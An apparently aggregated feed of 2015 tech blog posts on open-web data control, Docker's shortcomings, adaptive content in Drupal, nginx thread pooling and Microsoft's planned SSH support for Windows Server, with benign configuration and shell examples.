What makes this question difficult is that the walled gardens don't violate the promise of the web. In fact, we can credit them for amplifying the promise of the web. They have brought hundreds of millions of users online and enabled them to communicate and collaborate much more effectively. Google, Apple, Facebook and Twitter have a powerful democratizing effect by providing a forum for people to share information and collaborate; they have made a big impact on human rights and civil liberties. They should be applauded for that.

At the same time, their dominance is not without concerns. With over 1 billion users each, Google and Facebook are the platforms that the majority of people use to find their news and information. Apple has half a billion active iOS devices and is working hard to launch applications that keep users inside their walled garden. The two major concerns here are (1) control and (2) privacy.

First, there is the concern about control, especially at their scale. These organizations shape the news that most of the world sees. When too few organizations control the media and flow of information, we must be concerned. They are very secretive about their curation algorithms and have been criticized for inappropriate censoring of information.

Second, they record data about our behavior as we use their sites (and the sites their ad platforms serve) inferring information about our habits and personal characteristics, possibly including intimate details that we might prefer not to disclose. Every time Google, Facebook or Apple launch a new product or service, they are able to learn a bit more about everything we do and control a bit more about our life and the information we consume. They know more about us than any other organization in history before, and do not appear to be restricted by data protection laws. They won't stop until they know everything about us. If that makes you feel uncomfortable, it should. I hope that one day, the world will see this for what it is.

While the walled gardens have a positive and democratizing impact on the web, who is to say they'll always use our content and data responsibly? I'm sure that to most critical readers of this blog, the open web sounds much better. All things being equal, I'd prefer to use alternative technology that gives me precise control over what data is captured and how it is used.

Why are the walled gardens winning?

Why then are these walled gardens growing so fast? If the open web is theoretically better, why isn't it winning? These are important questions about future of the open web, open source software, web standards and more. It is important to think about how we got to a point of walled garden dominance, before we can figure out how an open web can win.

The biggest reason the walled gardens are winning is because they have a superior user experience, fueled by data and technical capabilities not easily available to their competitors (including the open web).

Unlike the open web, walled gardens collect data from users, often in exchange for free use of a service. For example, having access to our emails or calendars is incredibly important because it's where we plan and manage our lives. Controlling our smartphones (or any other connected devices such as cars or thermostats) provides not only location data, but also a view into our day-to-day lives. Here is a quick analysis of the types of data top walled gardens collect and what they are racing towards:

Walled gardens data

On top of our personal information, these companies own large data sets ranging from traffic information to stock market information to social network data. They also possess the cloud infrastructure and computing power that enables them to plow through massive amounts of data and bring context to the web. It's not surprising that the combination of content plus data plus computing power enables these companies to build better user experiences. They leverage their data and technology to turn “dumb experiences” into smart experiences. Most users prefer smart contextual experiences because they simplify or automate mundane tasks.

Walled gardens technology

Can the open web win?

I still believe in the promise of highly personalized, contextualized information delivered directly to individuals, because people ultimately want better, more convenient experiences. Walled gardens have a big advantage in delivering such experiences, however I think the open web can build similar experiences. For the open web to win, we first must build websites and applications that exceed the user experience of Facebook, Apple, Google, etc. Second, we need to take back control of our data.

Take back control over the experience

The obvious way to build contextual experiences is by combining different systems that provide open APIs; e.g. we can integrate Drupal with a proprietary CRM and commerce platform to build smart shopping experiences. This is a positive because organizations can take control over the brand experience, the user experience and the information flow. At the same time users don't have to trust a single organization with all of our data.

[Figure: Open web current state]

The current state of the web: one end-user application made up of different platforms that each have their own user experience and presentation layer and store their own user data.

To deliver the best user experience, you want “loosely-coupled architectures with a highly integrated user experience”. Loosely-coupled architectures so you can build better user experiences by combining your systems of choice (e.g. integrate your favorite CMS with your favorite CRM with your favorite commerce platform). Highly integrated user experiences so you can build seamless experiences, not just for end-users but also for content creators and site builders. Today's open web is fragmented. Integrating two platforms often remains difficult and the user experience is "mostly disjointed" instead of "highly integrated". As our respective industries mature, we must focus our attention on integrating the user experience as well as the data that drives it. The following "marketecture" illustrates that shift:

[Figure: Shared integration and user experience layer]

Instead of each platform having its own user experience, we have a shared integration and presentation layer. The central integration layer serves to unify data coming from distinctly different systems. In line with the "Big Reverse of the Web" theory, the presentation layer is not limited to a traditional web browser but could include push technology such as notifications.

For the time being, we have to integrate with the big walled gardens. They need access to great content for their users. In return, they will send users to our sites. Content management platforms like Drupal have a big role to play, by pushing content to these platforms. This strategy may sound counterintuitive to many, since it fuels the growth of walled gardens. But we can't afford to ignore ecosystems where the majority of users are spending their time.

Control personal data

At the same time, we have to worry about how to leverage people's data while protecting their privacy. Today, each of these systems or components contains user data. The commerce system might have data about past purchasing behavior, the content management system about who is reading what. Combining all the information we have about a user, across all the different touch-points and siloed data sources, will be a big challenge. Organizations typically don't want to share user data with each other, nor do users want their data to be shared without their consent.

The best solution would be to create a "personal information broker" controlled by the user. By moving the data away from the applications to the user, the user can control what application gets access to what data, and how and when their data is shared. Applications have to ask the user permission to access their data, and the user explicitly grants access to none, some or all of the data that is requested. An application only gets access to the data that we want to share. Permissions only need to be granted once but can be revoked or set to expire automatically. The application can also ask for additional permissions at any time; each time the person is asked first, and has the ability to opt out. When users can manage their own data and the relationships they have with different applications, and by extension with the applications' organizations, they take control over their own privacy. The government has a big role to play here; privacy law could help accelerate the adoption of "personal information brokers".
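As a thought experiment, a grant held by such a broker could be a small, revocable record per application; every field name below is invented purely for illustration:

{
  "application": "example-commerce-site",
  "data_scopes": ["purchase_history", "shipping_address"],
  "granted_at": "2015-06-23T08:00:00Z",
  "expires_at": "2016-06-23T08:00:00Z",
  "revoked": false
}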

[Figure: Open web personal information broker]

Instead of each platform having its own user data, we move the data away from the applications to the users, managed by a "personal information broker" under the user's control.

[Figure: Open web shared broker]

The user's personal information broker manages data access to different applications.

Conclusion

People don't seem too concerned about their data being hosted with these walled gardens; they've willingly handed it over so far. For the time being, "free" and "convenient" will be hard to beat. However, my prediction is that these data privacy issues will come to a head in the next five to ten years, and lack of transparency will become unacceptable to people. The open web should focus on offering user experiences that exceed those provided by walled gardens, while giving users more control over their data and privacy. When the open web wins through improved transparency, the closed platforms will follow suit, at which point they'll no longer be closed platforms. The best-case scenario is that we have it all: a better data-driven web experience that exists in service to people, not in the shadows.

by Dries at June 23, 2015 08:58 AM

Frank Goossens

Mobile web vs. Native apps; Forrester’s take

So the web is going away, being replaced by apps? Forrester did the research and does not agree:

Based on this data and other findings in the new report, Forrester advises businesses to design their apps only for their best and most loyal or frequent customers – because those are the only ones who will bother to download, configure and use the application regularly. For instance, most retailers say their mobile web sales outweigh their app sales, the report says. Meanwhile, outside of these larger players, many customers will use mobile websites instead of a business’ native app.

My biased interpretation: unless you think you can compete with Facebook for mobile users’ attention, mobile apps should maybe not be your most important investment. Maybe PPK conceded victory too soon after all?

by frank at June 23, 2015 07:45 AM

June 22, 2015

Frank Goossens

Ringland: the quietest summer hit?

So “Laat de mensen dansen” is being banned from VRT and Q-music because it is supposedly too political. I never thought Bart & Slongs would become the Flemish Johnny & Sid … Can I buy that record somewhere?

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at June 22, 2015 04:29 PM

June 21, 2015

Vincent Van der Kussen

A critical view on Docker

TL;DR Before you start reading this, I want to make it clear that I absolutely don't hate Docker or the application container idea in general, at all! I really see containers becoming a new way of doing things, in addition to the existing technologies. In fact, I use containers myself more and more.

Currently I'm using Docker for local development because it's so easy to get your environment up and running in just a few seconds. But of course, that is "local" development. Things start to get interesting when you want to deploy over multiple Docker hosts in a production environment.

At the "Pragmatic Docker Day" a lot of people who were using (some even in production) or experimenting with Docker showed up. Other people were completely new to Docker so there was a good mix.

During the Open Spaces in the afternoon we had a group of people who decided to stay outside (the weather was really too nice to stay inside) and started discussing the talks that were given in the morning sessions. This evolved into a rather good discussion about everyone's personal view on the current state of containers and what they might bring in the future. People chimed in and added their opinions to the conversation.

That inspired me to write about the following items which are a combination of the things that came up during the conversations and my own view on the current state of Docker.

The Dockerfile

A lot of people are now using some configuration management tool and have invested quite some time in their tool of choice to deploy and manage the state of their infrastructure. Docker provides the Dockerfile to build and configure your container images, and that feels a bit like a "dirty" hack compared to the features those config management tools already provide.

Quite some people are using their config management tool to build their container images. I, for instance, upload my Ansible playbooks into the image (during build) and then run them. This allows me to reuse existing work that I know works, and I can use it for both containers and non-containers.
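Purely as an illustration (the base image and playbook paths below are hypothetical), such a Dockerfile could look roughly like this:

FROM centos:7
# Install Ansible inside the build container (EPEL provides the package on CentOS)
RUN yum install -y epel-release && yum install -y ansible
# Copy the existing playbooks into the image and apply them locally at build time
COPY playbooks/ /opt/playbooks/
RUN ansible-playbook -i "localhost," -c local /opt/playbooks/site.yml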

It would have been nice if Docker somehow provided a way to integrate the existing configuration management tools a bit better. Vagrant does a better job here.

As far as I know you also can't use variables (think Puppet Hiera or Ansible Inventory) inside your Dockerfile. Something configuration management tools happen to be very good at.

Bash scripting

When building more complex Docker images you notice that a lot of Bash scripting is used to prep the image and make it do what you want: passing variables into configuration files, creating users, preparing storage, configuring and starting services, etc. While Bash is not necessarily a bad thing, it all feels like a workaround for things that are so simple when not using containers.
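To give an idea of the kind of glue involved, here is a hypothetical entrypoint script; every path and variable name in it is invented:

#!/bin/bash
set -e
# Fill a config template from an environment variable passed via `docker run -e APP_PORT=...`
: "${APP_PORT:=8080}"
sed "s/@PORT@/${APP_PORT}/" /etc/app/app.conf.tpl > /etc/app/app.conf
# Create a service user if it does not exist yet
id -u app >/dev/null 2>&1 || useradd -r app
# Hand PID 1 over to the actual service, running in the foreground
exec /usr/sbin/appd --config /etc/app/app.conf --foreground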

Dev vs Ops all over again?

The people I talked to agreed that Docker is rather developer focused and that it allows developers to build images containing a lot of stuff you might have no control over. It abstracts away possible issues. The container works, so all is well... right?

I believe that when you start building and using containers, the DevOps aspect is more important than ever. If, for instance, a CVE is found in a library or service that has been included in the container image, you'll need to update your base image and then roll the fix out through your deployment chain. To make this possible, all stakeholders must know what is included in which version of the Docker image. Needless to say, this needs both ops and devs working together. I don't think there's a need for the "separation of concerns" that Docker likes to advocate. Haven't we learned that creating silos isn't the best idea?

More complexity

Everything in the way you used to work becomes different once you start using containers. The fact that you can't ssh into something or let your configuration management make some changes just feels awkward.

Networking

By default Docker creates a Linux bridge on the host, on which it creates an interface for each container that gets started. It then adjusts the iptables NAT table to pass traffic entering a port on the host to the exposed port inside the container.
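For example (a sketch; the container IP and exact rule layout will differ per setup):

# Publish container port 80 on host port 8080
docker run -d -p 8080:80 nginx
# Inspect the NAT rules Docker added for it
iptables -t nat -L DOCKER -n
#   DNAT  tcp  --  0.0.0.0/0  0.0.0.0/0  tcp dpt:8080 to:172.17.0.2:80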

To have a more advanced network configuration you need to look at tools like weave, flannel, etc., which require more research to see what fits your specific use case best.

Recently I was wondering if it was possible to have multiple NICs inside your container, because I wanted this to test Ansible playbooks that configure multiple NICs. Currently it's not possible, but there's a ticket open on GitHub (https://github.com/docker/docker/issues/1824) which doesn't give me much hope.

Service discovery

Once you go beyond playing with containers on your laptop and start using multiple Docker hosts to scale your applications, you need a way to know where the specific service you want to connect to is running and on what port. You probably don't want to manually define ports per container on each host because that will become tedious quite fast. This is where tools like Consul, etcd, etc. come in. Again, some extra tooling and complexity.
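To give an idea, registering a containerized service with Consul comes down to dropping a small service definition in its configuration directory and querying it over DNS; the service name, port and health check below are made up:

{
  "service": {
    "name": "web",
    "port": 8080,
    "check": { "http": "http://localhost:8080/health", "interval": "10s" }
  }
}

Any node running a Consul agent can then resolve it via Consul's DNS interface:

dig @127.0.0.1 -p 8600 web.service.consul SRV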

Storage

You will always have something that needs persistence, and when you do, you'll need storage. Now, when using containers the Docker way, you are assumed to put as much as possible inside the container image. But some things, like log files, configuration files, application-generated data, etc., are a moving target.

Docker provides volumes to pass storage from the host into a container. Basically you map a path on the host to a path inside the container. But this poses some questions: how do I share this when the container gets restarted? How can I make sure this is secure? How do I manage all these volumes? What is the best way to share this among different hosts?
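On a single host, a bind-mounted volume is simple enough (paths and image name are hypothetical):

# Keep the application's logs on the host instead of inside the container
docker run -d -v /srv/app/logs:/var/log/app my-app-image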

One way to consolidate your volumes is to use "data-only" containers. This means that you run a container with some volumes attached to it and then link to them from other containers so they all use a central place to store data. This works but has some drawbacks imho.
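A minimal sketch of that pattern, with made-up names:

# Create (not run) a container whose only purpose is to own the /data volume
docker create -v /data --name appdata busybox
# Other containers reference its volumes
docker run -d --volumes-from appdata my-app-image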

This container just needs to exist (it doesn't even need to be running), and as long as this container or a container that links to it exists, the volumes are kept on the system. Now, if you accidentally delete the container holding the volumes, or you delete the last container linking to them, you lose all your data. With containers coming and going, it can become tricky to keep track of this, and making mistakes at this level has serious consequences.

Security

Docker images

One of the "advantages" that Docker brings is the fact that you can pull images from the Docker hub and from what I have read this is in most cases encouraged. Now, everyone I know who runs a virtualization platform will never pull a Virtual Appliance and run it without feeling dirty. when using a cloud platform, chances are that you are using prebuild images to deploy new instances from. This is analogue to the Docker images with that difference that people who care about their infrastructure build their own images. Now most Linux distributions provide an "official" Docker image. These are the so called "trusted" images which I think is fine to use as a base image for everything else. But when I search the Docker Hub for Redis I get 1546 results. Do you trust all of them and would you use them in your environment?

What can go wrong with pulling an OpenVPN container, right?

This is also an interesting read: https://titanous.com/posts/docker-insecurity

User namespacing

Currently there's no user namespacing, which means that if a UID inside the Docker container matches the UID of a user on the host, that user will have access to the host with the same permissions. This is one of the reasons why you should not run processes as the root user inside containers (or outside them, for that matter). But even then you need to be careful with what you're doing.
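A quick way to see the consequence, using a scratch directory on the host:

# A file created as root from inside the container, via a bind mount...
docker run --rm -v /tmp/shared:/shared busybox touch /shared/owned-by-root
# ...is owned by the real root user on the host, because UID 0 is UID 0 everywhere
ls -l /tmp/shared/owned-by-root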

Containers, containers, containers..

When you run more and more stuff in containers, you'll end up with a few hundred, a few thousand or even more containers. If you're lucky they all share the same base image. And even if they do, you still need to update them with fixes and security patches, which results in newer base images. At that point all your existing containers need to be rebuilt and redeployed. Welcome to the immutable world.

So the "problem" just shifts up a layer. A Layer where the developers have more control over what gets added. What do you do when the next OpenSSL bug pops up? Do you know which containers has which OpenSSL version..?

Minimal OS's

Everyone seems to be building these mini OS's these days, like CoreOS, ProjectAtomic, RancherOS, etc. The idea is that updating the base OS is a breeze (reboot, A/B partitions, etc.) and that all the services we need run inside containers.

That's all nice, but people with a sysadmin background will quickly start asking questions like: can I do software RAID? Can I add my own monitoring on this host? Can I integrate it with my storage setup? And so on.

Recap

What I wanted to point out is that when you decide to start using containers, keep in mind that you'll need to change your mindset and be ready to learn quite a few new ways of doing things.

While Docker is still young and has some shortcomings I really enjoy working with it on my laptop and use it for testing/CI purposes. It's also exciting (and scary at the same time) to see how fast all of this evolves.

I've been writing this post on and off for some weeks, and recently some announcements at DockerCon might address some of the above issues. Anyway, if you've read this far, thank you, and good luck with all your container endeavors.

by Vincent Van der Kussen at June 21, 2015 10:00 PM

Wim Leers

Eaton & Urbina: structured, intelligent and adaptive content

While walking, I started listening to Jeff Eaton’s Insert Content Here podcast, episode 25: Noz Urbina Explains Adaptive Content. People must’ve looked strangely at me because I was smiling and nodding — still walking :) Thanks Jeff & Noz!

Jeff Eaton explained how the web world looks at and defines the term WYSIWYG. Turns out that in the semi-structured, non-web world that Noz comes from, WYSIWYG has a totally different interpretation. And they ended up renaming it to what it really was: WYSIWOO.

Jeff also asked Noz what “adaptive content” is exactly. Adaptive content is a more specialized/advanced form of structured content, and in fact “structured content”, “intelligent content” and “adaptive content” form a hierarchy:

In other words, adaptive content is also intelligent and structured; intelligent content is also structured, but not all structured content is also intelligent or adaptive, nor is all intelligent content also adaptive.

Basically, intelligent content better captures the precise semantics (e.g. not a section, but a product description). Adaptive content is about using those semantics, plus additional metadata (“hints”) that content editors specify, to adapt the content to the context it is being viewed in. E.g. different messaging for authenticated versus anonymous users, or different nuances depending on how the visitor ended up on the current page (in other words: personalization).

Noz gave an excellent example of how adaptive content can be put to good use: he described how he had arrived in Utrecht in the Netherlands after a long flight, “checked in” to Utrecht on Facebook, and then Facebook suggested 3 open restaurants to him, including cuisine type and walking distance relative to his current position. He felt like thanking Facebook for these ads — which obviously is a rare thing, to be grateful for ads!

Finally, a wonderful quote from Noz Urbina that captures the essence of content modeling:

How descriptive do we make it without making it restrictive?

If it isn’t clear by now — go listen to that podcast! It’s well worth the 38 minutes of listening. I only captured a few of the interesting points, to get more people interested and excited.1

What about adaptive & intelligent content in Drupal 8?

First, see my closely related article Drupal 8: best authoring experience for structured content?.

Second, while listening, I thought of many ways in which Drupal 8 is well-prepared for intelligent & adaptive content. (Drupal already does structured content by means of the Field API and the HTML tag restrictions in the body field.) Implementing intelligent & adaptive content will surely require experimentation, and different sites/use cases will prefer different solutions, but:

I think that those two modules would be very interesting, useful additions to the Drupal ecosystem. If you are working on this, please let me know — I would love to help!


  1. That’s right, this is basically voluntary marketing for Jeff Eaton — you’re welcome, Jeff! 

by Wim Leers at June 21, 2015 06:08 PM

June 19, 2015

Frank Goossens

Music from Bruxelles ma belle Tube: Casssandra

Now that I've found Gilles Peterson’s WorldWide as a podcast on Radio Nova I’m once again enjoying the nuggets Gilles disperses to his worldwide audience. A couple of weeks ago he played “Sifflant Soufflant” by Casssandre (yes, 3 s’es, must be a Belgian thing), a Belgian jazz singer. While looking for that specific track on YouTube did not yield a result, I did find this live video, which is part of a series of performances recorded in beautiful places in Brussels;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

So there you have it; 2 nuggets in one go. Enjoy your weekend!

by frank at June 19, 2015 05:39 AM

June 18, 2015

Mattias Geniar

Increasing Nginx Performance With Thread Pooling

Fascinating stuff.

The result of enabling thread pooling and then benchmarking the change shows some pretty impressive performance gains.

Now our server produces 9.5 Gbps, compared to ~1 Gbps without thread pools!

and

The average time to serve a 4-MB file has been reduced from 7.42 seconds to 226.32 milliseconds (33 times less), and the number of requests per second has increased by 31 times (250 vs 8)!

The title of the article seems wrong: in the best-case scenario bandwidth increases almost 10x and the time to serve a file drops by a factor of 33.

Worth a read and definitely worth a test in your lab: Thread Pools in NGINX Boost Performance 9x!
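For testing it yourself, the configuration side is small; a minimal sketch, assuming nginx 1.7.11+ built with --with-threads (the location and path are made up):

# main context: define a pool of worker threads
thread_pool default threads=32 max_queue=65536;

http {
    server {
        location /downloads/ {
            root /storage;
            # offload blocking disk reads to the thread pool
            aio threads=default;
        }
    }
}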

The post Increasing Nginx Performance With Thread Pooling appeared first on ma.ttias.be.

by Mattias Geniar at June 18, 2015 08:00 PM

How SSH In Windows Server Completely Changes The Game

A few days ago, Microsoft announced their plans to support SSH.

At first, I only skimmed the news articles and misinterpreted the news as PowerShell getting SSH support to act as a client, but it appears this goes much deeper: SSH coming to Windows Server is both client and server support.

A popular request the PowerShell team has received is to use Secure Shell protocol and Shell session (aka SSH) to interoperate between Windows and Linux – both Linux connecting to and managing Windows via SSH and, vice versa, Windows connecting to and managing Linux via SSH.
Looking Forward: Microsoft Support for Secure Shell (SSH)

While the announcement in and of itself is worth a read, the comments show a lot of concern about the how of the implementation, hoping for industry-standard implementations instead of quirky forks of the protocol.

In the comments, the official PowerShell account also confirms that the SSH implementation will have both client and server support.

The SSH implementation will support both Client and Server.

This is super exciting.

SSH Public Key Authentication

SSH is just a protocol. Windows already has several protocols & methods for managing a server (RPC, PowerShell, AD Group Policies, ...), so why bring another one?

Supporting the SSH server on Windows can bring the biggest advancement to Windows in a long time: SSH public key authentication.

Historically, managing a Windows server was either based on username/password combinations or NTLM. There are other alternatives, but these 2 are the most widely used. You either type your username and password, or you belong to an Active Directory domain for easier access.

Managing standalone Windows machines has therefore always been a serious annoyance. It requires keeping a list of username/password combinations.

If SSH support in Windows is done right, it would mean a new authentication method that is perfect for automation tasks.
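On the Linux side that workflow is just a couple of commands; presumably something equivalent would apply to a Windows SSH server (the host name and key file below are made up):

# Generate a dedicated key pair for automation
ssh-keygen -t ed25519 -f ~/.ssh/automation -C "automation key"
# Authorize the public key on the managed machine (appends it to ~/.ssh/authorized_keys)
ssh-copy-id -i ~/.ssh/automation.pub admin@server.example.com
# From then on, log in without typing a password
ssh -i ~/.ssh/automation admin@server.example.com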

It inevitably also means that supporting SSH on Windows isn't trivial: it ties into the user management, authentication & authorization. This would be a major feature to push out.

Config Management For Windows

Configuration Management isn't new for Windows. In fact, in many regards, automating state and configuration is far more advanced in Windows than it is on Linux.

However, the tools to automate on Windows have mostly been proprietary, complex and very expensive to both purchase and maintain. In the Open Source world there are many alternatives for config management a user could choose from.

For a couple of years now, even the Open Source tools have begun to show rudimentary support for managing Windows Server (ref.: Puppet, Chef, Ansible, ...).

Having SSH access to a Windows Server with proper SSH public key support would allow all kind of SSH-based config management tools to be used for managing a Windows Server, whether it's in an Active Directory domain or a standalone server.

Even if Ansible didn't have native Windows support, just having SSH available would be sufficient to use Ansible to completely manage a Windows server.
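Purely hypothetical, since it presumes the Windows SSH server ships with public key support, but the Ansible inventory would look no different from a Linux one (host name and key path invented):

[windows]
win-app01.example.com ansible_ssh_user=Administrator ansible_ssh_private_key_file=~/.ssh/automation

# Ad-hoc commands would then work just like against Linux hosts, e.g.:
#   ansible windows -m raw -a "powershell.exe Get-Service"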

Imagine the power.

The Proof Of The Pudding Is In The Eating

Hmmm, pudding ...

Sorry, I digress.

As Microsoft has correctly admitted, this is the 3rd attempt to integrate SSH into Windows.

The first attempts were during PowerShell V1 and V2 and were rejected. Given our changes in leadership and culture, we decided to give it another try and this time, because we are able to show the clear and compelling customer value, the company is very supportive.

A public statement proclaiming support for native SSH is a powerful thing, but it's by no means a guarantee that it'll happen. The lack of a clear timeline also shows how early in the process this idea is.

I'm hoping support for SSH server in Windows Server eventually becomes a standard on every server. I'm biased because I come from a Linux background, but having an SSH server with public key authentication would greatly simplify my life of automating Windows environments.

There are alternatives for doing that. There have always been alternatives. I just don't like them. I like having SSH access to manage a server and I'm rooting for Microsoft to pull this off as well.

The post How SSH In Windows Server Completely Changes The Game appeared first on ma.ttias.be.

by Mattias Geniar at June 18, 2015 07:27 PM